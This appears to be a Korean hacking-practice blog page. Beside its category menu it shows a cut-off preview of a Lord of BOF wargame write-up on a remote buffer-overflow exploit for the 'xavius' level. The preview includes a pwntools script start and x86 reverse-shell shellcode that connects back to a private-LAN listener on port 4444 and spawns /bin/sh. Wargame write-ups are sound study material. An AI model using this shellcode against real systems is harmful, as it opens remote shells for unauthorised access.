연습 또 연습.

  • 홈
  • 방명록

write-up/LoB 1

xavius remote exploit bruteforce

from pwn import * import sys # gdb-peda # shellcode generate x86/linux 4444 192.168.3.136 shellcode = ( "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\xc0\xa8\x03\x80\x66\x68" "\x11\x5c\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" "\x89\xe1\xb0\x0b\xcd\x80"..

write-up/LoB 2018.01.21
1
더보기
  • 분류 전체보기 (172)
    • profile (0)
    • Programming (28)
      • C (6)
      • ruby (2)
      • python (12)
      • PS (3)
    • 웹 (4)
      • PHP (11)
      • Bootstrap (3)
      • MySQL (7)
      • 웹_기타 (6)
      • SQLi (5)
      • XSS (1)
      • JSP,tomcat (2)
    • pwnable (15)
      • Fuzzing (3)
      • Shellcoding (5)
      • arm (1)
    • Kernel (1)
      • Kernel Basics (0)
      • Kernel Exploits (1)
    • Reversing (1)
    • Rails (4)
    • AWS (6)
    • Linux (14)
    • AI (3)
    • write-up (1)
      • pwnable.kr (0)
      • webhacking.kr (19)
      • pythonchallenge.com (2)
      • CTF (2)
      • 라이트업 모음 (0)
      • LoB (1)
      • pwnable (5)
      • ctf.j0n9hyun.xyz (2)
      • pwnable.tw (0)
      • canhack.me (0)
      • knock.xss.moe (1)
    • Docker (3)
    • Android (1)
    • 문서 (4)
      • 시스템 문서 (2)
      • 리버싱 문서 (0)
      • 포렌식 문서 (0)
      • 웹 문서 (1)
      • 기타 문서 (1)
    • 기타 (7)

alkyne Choi

Copyright © Kakao Corp. All rights reserved.

티스토리툴바